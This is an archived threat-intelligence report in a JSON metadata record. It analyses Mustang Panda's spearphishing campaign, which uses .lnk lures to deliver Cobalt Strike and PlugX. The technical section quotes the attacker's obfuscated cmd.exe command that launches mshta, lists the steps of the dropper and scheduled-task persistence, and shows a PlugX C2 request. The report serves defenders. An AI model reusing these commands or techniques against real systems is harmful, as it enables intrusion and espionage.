{
	"id": "4b4bbb42-2168-4db1-929c-9cf8ba7ecefd",
	"created_at": "2026-04-06T00:15:36.544891Z",
	"updated_at": "2026-04-10T03:36:33.987982Z",
	"deleted_at": null,
	"sha1_hash": "1399399e1e36cc093bb1abae7e381f6604508a02",
	"title": "China-Based APT Mustang Panda Targets Minority Groups, Public and Private Sector Organizations",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 5139606,
	"plain_text": "China-Based APT Mustang Panda Targets Minority Groups, Public and Private Sector Organizations\r\nBy Anomali Threat Research\r\nPublished: 2025-12-18 · Archived: 2026-04-05 23:35:50 UTC\r\nThis whitepaper examines a campaign believed to be conducted by the China-based threat group Mustang Panda. Read the paper from Anomali Threat Research.\r\nMustang Panda Overview\r\nTargeting\r\nLure Document Analysis\r\nTargeting Pakistan\r\nTechnical Analysis\r\nConclusion\r\nMustang Panda Overview\r\nhttps://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations#When:17:14:00Z\r\nPage 1 of 15\n\nThe Anomali Threat Research Team has identified an ongoing campaign which it believes is being conducted by the China-based threat group Mustang Panda. The team first revealed these findings on Wednesday, October 2, during Anomali Detect 19, the company’s annual user conference, in a session titled “Mustang Panda Riding Across Country Lines.”\r\nCrowdStrike researchers first published information on Mustang Panda in June 2018, after approximately one year of observing malicious activities that shared unique Tactics, Techniques, and Procedures (TTPs).[1] This campaign dates back to at least November 2018. The research does not indicate with absolute certainty which entities are being targeted or the impact the campaign has had. 
Based on the lure documents observed by Anomali, we believe that the following may be targeted:\r\nIndividuals interested in the United Nations’ Security Council Committee resolutions regarding the Islamic State in Iraq and the Levant (ISIL / Da’esh)\r\nMongolian-based MIAT Airlines\r\nNon-profit China Center (China-Zentrum e.V.); according to its website, this officially recognized nonprofit organization’s aim is to foster encounters and exchange between cultures and religions in the West and in China\r\nTargeted countries including but not limited to Germany, Mongolia, Myanmar (Burma), Pakistan, Vietnam\r\nThe Communist Party of Vietnam (CPV)\r\nThe Shan Tai; a group of people living in Southeast Asia, which Minority Rights Group International describes as a “minority” in the region, with members who are primarily Theravada Buddhists\r\nThe malicious activity found by Anomali aligns with TTPs, specifically two through six, first identified by CrowdStrike. The observed TTPs consist of the following:\r\n1. Use of a zip file that contains a “.lnk” (Windows Shortcut) file.\r\n2. Utilization of the double extension trick (sample.doc.lnk) to convince users to open the file.\r\n3. HTA (HTML Application) with VBScript embedded in the “.lnk” file.\r\n4. VBScript drops payloads and opens a decoy document or PDF for the user.\r\n5. Usage of PlugX and Cobalt Strike payloads.[2]\r\nThe infection chain observed by Anomali researchers in this campaign is shown below in Figure 1.\r\nFigure 1 – Infection vector\r\nWe also found similarities in targeting in Mongolia and an NGO. The use of United Nations’ documents regarding activities in the Middle East may also be indicative of think-tank targeting. 
Furthermore, the use of PlugX malware also aligns with CrowdStrike’s previous findings of activity attributed to Mustang Panda.[3]\r\nAnalysts’ note: The language capabilities to read some of the lure documents are not available within Anomali at this time. We would encourage those with the necessary language skills to analyze the documents further.\r\nTargeting\r\nIn mid-August 2019, the Anomali Threat Research Team discovered suspicious “.lnk” files during routine intelligence collection. While the distribution method of these documents cannot be confirmed at this time, it is likely that spearphishing is being utilized, because it aligns with Mustang Panda’s TTPs and it is a common tactic used amongst APT actors. The lure documents are also highly specific in their targeting, and the targeted entities and individuals would be of interest to a China-sponsored threat group.\r\nFurther analysis of the files led to the identification of other “.lnk” files that were attempting to infect individuals with a Cobalt Strike Beacon (penetration-testing tool) or PlugX (Remote Access Tool (RAT)); other payloads were unable to be identified as of this writing. Anomali researchers identified 15 malicious documents that we believe were utilized by Mustang Panda in an ongoing campaign. The documents reveal malicious activity dating from at least November 2018 up to August 29, 2019. The date of this activity is confirmed by the VirusTotal (VT) submission dates, which will be analyzed further in the following sections. In addition, the dates within the documents go back as far as October 8, 2017; therefore, it is possible this activity goes back to 2017 if the group was using current content in their lures. 
The primary target of this campaign was found to be the ruling political party of Vietnam, the Communist Party of Vietnam (CPV); other targets observed in the malicious documents include the following:\r\nCPV of Lang Son province, Vietnam\r\nCPV of Lao Cai province, Vietnam\r\nEmbassy of Vietnam, China\r\nHenan Provincial Party Committee, Vietnam\r\nIndividuals who would find United Nations’ documents of interest, potentially think tanks\r\nMIAT Airlines, Mongolian airline\r\nPolice of Sindh Province, Pakistan\r\nRestoration Council of Shan State / Shan State Army, Loi Tai Leng, Southern Shan State, Myanmar (Burma)\r\nThe China Center (China Zentrum e.V), Germany\r\nThe lure documents are themed to be relevant to their targets, and in some cases are copies of legitimate documents that are publicly available. The “.lnk” files being utilized by Mustang Panda typically contain an embedded HTA script that, once executed, will drop and open the decoy document while the malicious activity of the payload runs in the background. The final type of malicious document we observed was empty and contained only an image, such as a request to enable macros, used to distract the user while malicious activity takes place in the background.\r\nLure Document Analysis\r\nThe 15 documents will be discussed below from the most recent VT submission to the earliest. The identified samples follow the same infection chain, and the technical analysis will be discussed in a later section.\r\nDocument – 1\r\nDocument Title – TCO BT574.doc\r\nSample – 05CF906B750EB335125695DA42F4EAFC\r\nPayload – Cobalt Strike\r\nSubmission date – 8/29/2019 1:27:41 AM\r\nFigure 2 – TCO BT574.doc\r\nAs seen above, this document is addressed to the Embassy of Vietnam in China. 
The document appears to discuss a warning issued to the Vietnam government related to a military exercise at a set of coordinates. Specifically, the document states that no civilian ships are allowed at said coordinates. The document continues and mentions a new ice-breaking ship called “Snow Dragon 2”, and mentions August 15, 2019, as the beginning of a 35-day trial run. This document indicates a regional interest with specificity.\r\nDocument – 2\r\nDocument Title – 32_1.PDF\r\nSample – 9A180107EFB15A00E64DB3CE6394328D\r\nPayload – Cobalt Strike Beacon\r\nSubmission date – 8/26/2019 6:28:40 AM\r\nFigure 3 – 32_1.pdf\r\nMustang Panda is using this decoy document, dated August 15, 2019, to target the People’s Committee of Lang Son Province. The People’s Committee is the executive branch of a Vietnamese province.[4] The Lang Son province shares a border with China’s Guangxi Province. The area has historically served as an important location for trade, and therefore control over the location has long been disputed and fought over.[5] The border shared between China and Vietnam measures 1,281 km in length; multiple wars have been fought over it and numerous lives lost, the complexities and intricacies of which will not be further discussed.[6]\r\nDocument – 3\r\nDocument Title – Daily News (19-8-2019)\r\nSample – 5F094CB3B92524FCED2731C57D305E78\r\nPayload – PlugX\r\nSubmission date – 8/19/2019 6:11:32 AM\r\nFigure 4 – Daily News (19-8-2019)\r\nThis document appears to be targeting the Shan Tai people by using a document referencing the Restoration Council of Shan State (RCSS). 
The Shan Tai people make up the largest minority group in Myanmar (Burma) and are located in Northwestern and Eastern Myanmar (Burma) and the Yunnan province in China.[7] The RCSS, also referred to as the Shan State Army (SSA), is a government/political organization that is headquartered in Loi Tai Leng, Southern Shan State, in present-day Myanmar (Burma), bordering Thailand.[8] The targeting of minority groups is a known tactic used by the government of the People’s Republic of China.\r\nDocument – 4\r\nDocument Title – S_2019_50_E.lnk\r\nSample – 4FE276EDC21EC5F2540C2BABD81C8653\r\nPayload – PlugX\r\nSubmission date – 6/6/2019 9:37:18 AM\r\nFigure 5 – S_2019_50_E.docx\r\nMustang Panda retrieved this document from the United Nations Digital Library; it is titled “Letter dated 15 January 2019 from the Chair of the Security Council Committee Established pursuant to Resolutions 1267 (1999), 1989 (2011) and 2253 (2015) concerning Islamic State in Iraq and the Levant (Da'esh), Al-Qaida and Associated Individuals, Groups, Undertakings and Entities addressed to the President of the Security Council.”[9]\r\nAt the time of this writing, it is unknown who, or what, this document may be targeting. 
However, think-tank organizations may be interested in such a document, and said organizations were found to be targets of Mustang Panda by CrowdStrike.[10]\r\nDocument – 5\r\nDocument Title – European.lnk\r\nSample – 9FF1D3AF1F39A37C0DC4CEEB18CC37DC\r\nPayload – PlugX\r\nSubmission date – 6/5/2019 6:28:25 PM\r\nFigure 6 – European.lnk\r\n“European.doc” is targeting The China Center (China Zentrum e.V), which is, according to its website, a non-profit organization that “encourages encounters and exchange between cultures and religions in the West and in China. The members of the China-Zentrum are Catholic aid organizations, religious orders and dioceses in Germany, Austria, Switzerland and Italy.”[11] Targeting of NGOs was first documented by CrowdStrike, and we believe we have observed Mustang Panda attempting to attack a similar type of target.[12] In addition, an institution focused on exchanging cultural knowledge aligns with China’s strategic interests.\r\nTargeting Pakistan\r\nUpon pivoting from the C2 domain apple-net[.]com, observed in the other samples that are part of the campaign, Anomali found a malicious sample that targets the Police of the Sindh Province in Pakistan. 
The PlugX malware has been observed as the payload that is targeting the Sindh Province police.\r\nFigure 7 – Samples Connecting to apple-net[.]com\r\nFigure 8 – DSR \u0026 CSR of Special Branch Sind.exe\r\nTechnical Analysis\r\nThe “.lnk” files being utilized by Mustang Panda typically contain an embedded HTA file with a VBScript or PowerShell script that, once executed, will drop and open the decoy document while the malicious activity of the payload runs in the background. Throughout the campaign we observed PlugX and Cobalt Strike being delivered as the primary payloads.\r\nFigure 9 – Infection vector\r\n“.lnk” File Analysis\r\nIn Windows, “.lnk” is the file extension for shortcut files, which point to an executable file. “.lnk” files usually hold plenty of forensic artifacts, and they can reveal valuable information about the threat actor’s environment. 
The metadata from the “.lnk” files led us to pivot to more samples from the same campaign.\r\nFigure 10 – “.lnk” File\r\nTable 1 below shows the files that were part of the recent campaign from Mustang Panda.\r\nTable 1 – Analyzed Samples\r\nMD5 | Link Creation Date | File Name | Payload\r\n165F8683681A4B136BE1F9D6EA7F00CE | 11/21/10 3:24 | chuong trinh dang huong.doc.lnk | Cobalt Strike\r\n9FF1D3AF1F39A37C0DC4CEEB18CC37DC | 11/21/10 3:24 | European.lnk | PlugX\r\n4FE276EDC21EC5F2540C2BABD81C8653 | 11/21/10 3:24 | S_2019_50_E.lnk | PlugX\r\n11ADDA734FC67B9CFDF61396DE984559 | 11/21/10 3:24 | Chuong trinh hoi nghi.doc.lnk | Cobalt Strike\r\n08F25A641E8361495A415C763FBB9B71 | 11/21/10 3:24 | GIAY MOI.doc.lnk | Cobalt Strike\r\n01D74E6D9F77D5202E7218FA524226C4 | 11/21/10 3:24 | 421 CV.doc.lnk | Cobalt Strike\r\n6198D625ADA7389AAC276731CDEBB500 | 11/21/10 3:24 | GIAYMOI.doc.lnk | Cobalt Strike\r\n9B39E1F72CF4ACFFD45F45F08483ABF0 | 11/21/10 3:24 | CV trao doi CAT Cao Bang.doc.lnk | Cobalt Strike\r\n748DE2B2AA1FA23FA5996F287437AF1B | 11/20/10 21:29 | cf56ee00be8ca49d150d85dcb6d2f336.jpg.lnk | PlugX\r\n5F094CB3B92524FCED2731C57D305E78 | 11/21/10 3:24 | Daily News (19-8-2019)(Soft Copy).lnk | PlugX\r\n9A180107EFB15A00E64DB3CE6394328D | 11/21/10 3:24 | 32_1.PDF.lnk | Cobalt Strike\r\n05CF906B750EB335125695DA42F4EAFC | 11/21/10 3:24 | TCO BT 574.doc.lnk | Cobalt Strike\r\nF62DFC4999D624D01E94B89946EC1036 | 11/21/10 3:24 | sach tham khao Bo mon.docx.lnk | PlugX\r\nCA775717D000888A7F71A5907B9C9208 | 11/21/10 3:24 | tieu luan ve quyen lam chu cua nhan dan.docx.lnk | PlugX\r\nAA115F20472E78A068C1BBF739C443BF | 11/21/10 3:24 | vai tro cua nhan dan.doc.lnk | PlugX\r\n11511b3d69fbb6cceaf1dd0278cbedfb | 11/21/10 3:24 | For National Department Sar KNU JMC people Meeting 2019.lnk | PlugX\r\nOnce the user opens the “.lnk” file, the embedded HTA file will be executed via “mshta.exe”; it then writes a PowerShell script named “3.ps1” in the “%TEMP%” directory. 
The PowerShell script is then executed using Windows Management Instrumentation (WMI) in a hidden window via WMI Tasks.[13]\r\nFigure 11 – VBScript drops PowerShell script\r\nFigure 12 – Using WMI to execute PowerShell Script in Hidden window\r\nThe dropped file “3.ps1” is a base64 encoded PowerShell script. Upon execution it performs the below operations on the target host:\r\n1. Checks if the user has Administrator privilege\r\n2. Drops the Cobalt Strike Stager in the debug or “%TEMP%” directory as “tmp_FlVnNI.dat”, depending on the user privilege\r\n3. Opens the decoy Word document\r\n4. Locates InstallUtil.exe and its installed version\r\n5. Copies “schtasks.exe” to the “%TEMP%” directory and renames it to “wtask.exe”\r\n6. Creates a scheduled task with the name “Security Script kb00855787”\r\n7. Renames “wscript.exe” to “winwsh.exe”\r\n8. Runs the scheduled task to execute the Cobalt Strike Stager\r\n9. C2 communication\r\nFigure 13 – Scheduled Task Creation\r\nFigure 14 – PowerShell Script Creates Scheduled Task\r\nFigure 15 – Cobalt Strike Payload\r\nDuring our analysis, we could not acquire the second stage payload, as the C2 servers were not functioning or had been taken down by the threat actors.\r\nPlugX Payload Analysis\r\n“.lnk” files that used PlugX as the payload were abnormally big in size. In general, “.lnk” files are less than 10 KB, but the malicious samples in the campaign were more than 700 KB. 
Upon taking a closer look we found that the “.lnk” files were embedded with 3 base64 encoded executables.\r\nUpon opening the LNK file, it will then proceed to execute the below command via cmd.exe.\r\ncommand: /c for %x in (%temp%=%cd%) do for /f \"delims==\" %i in ('dir \"%x\\tieu luan ve quyen lam chu cua nhan dan.docx.lnk\" /s /b') do start m%windir:~-1,1%hta .exe \"%i\"\r\nThe command executes the HTA file embedded inside the shortcut; the HTA decodes and drops 3 executables in the “%TEMP%” directory and opens a decoy Word document for the user.\r\nFigure 16 – Extracted binaries and Decoy document\r\nAll three dropped files were then moved to a new folder, “C:\\ProgramData\\Microsoft Malware Protection\\GHQ”.\r\nFigure 17 – Binaries moved to different path\r\n“3.exe” is a legitimate executable signed by “ESET, spol. s r.o.”; it is being abused in a DLL hijacking technique to execute http_dll.dll, which decodes and loads the malicious payload http_dll.dat.\r\nTable 2 – PlugX Hashes\r\nFile Name | Hash\r\n3.exe (original name: EHttpSrv.exe) | 28C6F235946FD694D2634C7A2F24C1BA\r\nhttp_dll.dll | 9912EB641EABD640A476720C51F5E3AD\r\nhttp_dll.dat | 2BC7298A57AE2B8AB\r\nAfter the payload execution it reaches out to the C2 via a POST request as shown below.\r\nPOST /update?wd=4337295e HTTP/1.1\r\nAccept: */*\r\nx-debug: 0\r\nx-request: 0\r\nx-content: 61456\r\nx-storage: 1\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1;\r\nHost: aridndvn.ccom:443\r\nContent-Length: 0\r\nProxy-Connection: Keep-Alive\r\nPragma: no-cache\r\nIf the C2 is not available, the payload tries to reach different embedded C2 domains on unique ports.\r\nFigure 18 – Network connections to C2\r\nConclusion\r\nThe malicious operations conducted by Mustang Panda in this campaign appear to be ongoing. 
The targets, indicated by specific lure documents, are government entities or align strategically with the interests of a China-sponsored APT group. China is currently in its 13th Five-Year Plan (2016-2020), which focuses on the following themes: innovation, coordinated development, green growth, openness, and inclusive growth.[14] The objective of increasing exports and specific imports, which falls under openness, would align with the targeting of the Lang Son province and its history of trade. Utilizing lures themed around political parties, the Sindh police, and UN documents would align with innovation, which is described “as the cornerstone of China’s development strategy” and attempts at “enhancing its future global competitiveness and technological edge.”[15] Targeting entities, or related entities, of said lures indicates a potential regional interest in strategic information that may be of significance to a government. In addition, the TTPs observed by CrowdStrike are identical to the ones observed by Anomali.\r\nThis activity has been ongoing since at least November 2018, and possibly as far back as October 2017 if the lure documents were distributed around the times mentioned in them. This kind of malicious activity sponsored by China will likely continue as the country expands its efforts for the ongoing Belt and Road Initiative, which seeks to invest in infrastructure in over 100 countries. 
Such economic and investment-led initiatives will cause China to be more interested in the regions it is investing in; therefore, it is likely that APT-related activity will follow.\r\nIOCs\r\nIn addition, ATR found that the documents were attempting to, or were able to, connect to the following Command and Control (C2) domains and IP addresses.\r\nEndnotes\r\n[1] Adam Meyers, “Meet CrowdStrike’s Adversary of the Month for June: MUSTANG PANDA,” CrowdStrike Blog, accessed September 17, 2019, published June 15, 2018, https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-june-mustang-panda/.\r\n[2] Ibid.\r\n[3] Ibid.\r\n[4] Dr. 
Joop de Wit, “Decentralisation, Local Governance and Community Participation in Vietnam,” United Nations (2016): 5, accessed September 18, 2019, http://www.un.org.vn/en/publications/one-un-documents/cat_view/106-one-un-documents/124-reference-documents.html.\r\n[5] Kathy Wilhelm, “China, Vietnam Make Money, Not War; Border Tensions Remain : Asia: Many fear the dispute over Friendship Pass and more than 200 other sites could reignite fighting between the longtime enemies,” Los Angeles Times, accessed September 18, 2019, published October 22, 1995, https://www.latimes.com/archives/la-xpm-1995-10-22-mn-59742-story.html.\r\n[6] “Vietnam – Geography,” GlobalSecurity, accessed September 18, 2019, https://www.globalsecurity.org/military/world/vietnam/geography.htm.\r\n[7] The Editors of Encyclopaedia Britannica, “Shan,” Encyclopaedia Britannica, accessed September 17, 2019, https://www.britannica.com/topic/Shan; “Shans,” World Culture Encyclopedia, accessed September 18, 2019, https://www.everyculture.com/wc/Mauritania-to-Nigeria/Shans.html.\r\n[8] “Restoration Council of Shan State/ Shan State Army,” Myanmar Peace Monitor, accessed September 17, 2018, https://www.mmpeacemonitor.org/1598.\r\n[9] https://digitallibrary.un.org/record/1663461. Accessed September 18, 2019.\r\n[10] Adam Meyers, “Meet CrowdStrike’s Adversary of the Month for June: MUSTANG PANDA,” CrowdStrike Blog.\r\n[11] http://www.china-zentrum.de/. 
Accessed September 18, 2019.\r\n[12] Adam Meyers, “Meet CrowdStrike’s Adversary of the Month for June: MUSTANG PANDA,” CrowdStrike Blog.\r\n[13] Windows Dev Center, “WMI Tasks: Processes,” Microsoft, accessed September 18, 2019, https://docs.microsoft.com/en-us/windows/win32/wmisdk/wmi-tasks--processes.\r\n[14] Katherine Koleski, “The 13th Five-Year-Plan,” The United States-China Economic and Security Review Commission, accessed September 20, 2019, published February 14, 2017, https://www.uscc.gov/sites/default/files/Research/The%2013th%20Five-Year%20Plan_Final_2.14.17_Updated%20%28002%29.pdf, 3.\r\n[15] Ibid.\r\nSource: https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations#When:17:14:00Z",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations#When:17:14:00Z"
	],
	"report_names": [
		"china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations#When:17:14:00Z"
	],
	"threat_actors": [
		{
			"id": "b69037ec-2605-4de4-bb32-a20d780a8406",
			"created_at": "2023-01-06T13:46:38.790766Z",
			"updated_at": "2026-04-10T02:00:03.101635Z",
			"deleted_at": null,
			"main_name": "MUSTANG PANDA",
			"aliases": [
				"Stately Taurus",
				"LuminousMoth",
				"TANTALUM",
				"Twill Typhoon",
				"TEMP.HEX",
				"Earth Preta",
				"Polaris",
				"BRONZE PRESIDENT",
				"HoneyMyte",
				"Red Lich",
				"TA416"
			],
			"source_name": "MISPGALAXY:MUSTANG PANDA",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "6daadf00-952c-408a-89be-aa490d891743",
			"created_at": "2025-08-07T02:03:24.654882Z",
			"updated_at": "2026-04-10T02:00:03.645565Z",
			"deleted_at": null,
			"main_name": "BRONZE PRESIDENT",
			"aliases": [
				"Earth Preta ",
				"HoneyMyte ",
				"Mustang Panda ",
				"Red Delta ",
				"Red Lich ",
				"Stately Taurus ",
				"TA416 ",
				"Temp.Hex ",
				"Twill Typhoon "
			],
			"source_name": "Secureworks:BRONZE PRESIDENT",
			"tools": [
				"BlueShell",
				"China Chopper",
				"Claimloader",
				"Cobalt Strike",
				"HIUPAN",
				"ORat",
				"PTSOCKET",
				"PUBLOAD",
				"PlugX",
				"RCSession",
				"TONESHELL",
				"TinyNote"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "9baa7519-772a-4862-b412-6f0463691b89",
			"created_at": "2022-10-25T15:50:23.354429Z",
			"updated_at": "2026-04-10T02:00:05.310361Z",
			"deleted_at": null,
			"main_name": "Mustang Panda",
			"aliases": [
				"Mustang Panda",
				"TA416",
				"RedDelta",
				"BRONZE PRESIDENT",
				"STATELY TAURUS",
				"FIREANT",
				"CAMARO DRAGON",
				"EARTH PRETA",
				"HIVE0154",
				"TWILL TYPHOON",
				"TANTALUM",
				"LUMINOUS MOTH",
				"UNC6384",
				"TEMP.Hex",
				"Red Lich"
			],
			"source_name": "MITRE:Mustang Panda",
			"tools": [
				"CANONSTAGER",
				"STATICPLUGIN",
				"ShadowPad",
				"TONESHELL",
				"Cobalt Strike",
				"HIUPAN",
				"Impacket",
				"SplatCloak",
				"PAKLOG",
				"Wevtutil",
				"AdFind",
				"CLAIMLOADER",
				"Mimikatz",
				"PUBLOAD",
				"StarProxy",
				"CorKLOG",
				"RCSession",
				"NBTscan",
				"PoisonIvy",
				"SplatDropper",
				"China Chopper",
				"PlugX"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "2ee03999-5432-4a65-a850-c543b4fefc3d",
			"created_at": "2022-10-25T16:07:23.882813Z",
			"updated_at": "2026-04-10T02:00:04.776949Z",
			"deleted_at": null,
			"main_name": "Mustang Panda",
			"aliases": [
				"Bronze President",
				"Camaro Dragon",
				"Earth Preta",
				"G0129",
				"Hive0154",
				"HoneyMyte",
				"Mustang Panda",
				"Operation SMUGX",
				"Operation SmugX",
				"PKPLUG",
				"Red Lich",
				"Stately Taurus",
				"TEMP.Hex",
				"Twill Typhoon"
			],
			"source_name": "ETDA:Mustang Panda",
			"tools": [
				"9002 RAT",
				"AdFind",
				"Agent.dhwf",
				"Agentemis",
				"CHINACHOPPER",
				"China Chopper",
				"Chymine",
				"ClaimLoader",
				"Cobalt Strike",
				"CobaltStrike",
				"DCSync",
				"DOPLUGS",
				"Darkmoon",
				"Destroy RAT",
				"DestroyRAT",
				"Farseer",
				"Gen:Trojan.Heur.PT",
				"HOMEUNIX",
				"Hdump",
				"HenBox",
				"HidraQ",
				"Hodur",
				"Homux",
				"HopperTick",
				"Hydraq",
				"Impacket",
				"Kaba",
				"Korplug",
				"LadonGo",
				"MQsTTang",
				"McRAT",
				"MdmBot",
				"Mimikatz",
				"NBTscan",
				"NetSess",
				"Netview",
				"Orat",
				"POISONPLUG.SHADOW",
				"PUBLOAD",
				"PVE Find AD Users",
				"PlugX",
				"Poison Ivy",
				"PowerView",
				"QMAGENT",
				"RCSession",
				"RedDelta",
				"Roarur",
				"SPIVY",
				"ShadowPad Winnti",
				"SinoChopper",
				"Sogu",
				"TIGERPLUG",
				"TONEINS",
				"TONESHELL",
				"TVT",
				"TeamViewer",
				"Thoper",
				"TinyNote",
				"WispRider",
				"WmiExec",
				"XShellGhost",
				"Xamtrav",
				"Zupdax",
				"cobeacon",
				"nbtscan",
				"nmap",
				"pivy",
				"poisonivy"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434536,
	"ts_updated_at": 1775792193,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/1399399e1e36cc093bb1abae7e381f6604508a02.pdf",
		"text": "https://archive.orkl.eu/1399399e1e36cc093bb1abae7e381f6604508a02.txt",
		"img": "https://archive.orkl.eu/1399399e1e36cc093bb1abae7e381f6604508a02.jpg"
	}
}